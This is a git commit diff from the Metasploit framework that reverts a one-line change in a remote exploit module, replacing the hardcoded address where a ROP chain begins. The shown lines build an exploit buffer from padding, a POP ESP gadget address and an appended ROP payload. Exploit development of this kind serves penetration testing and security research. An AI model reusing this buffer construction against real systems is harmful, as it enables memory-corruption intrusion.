Revert this change

bug/bundler_fix
sinn3r 2013-11-25 20:54:39 -06:00
parent 3247106626
commit fa97c9fa7c
1 changed files with 1 additions and 1 deletions

View File

@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 32 #52
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x12dd0704].pack('V') # Final payload target address to begin the ROP
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload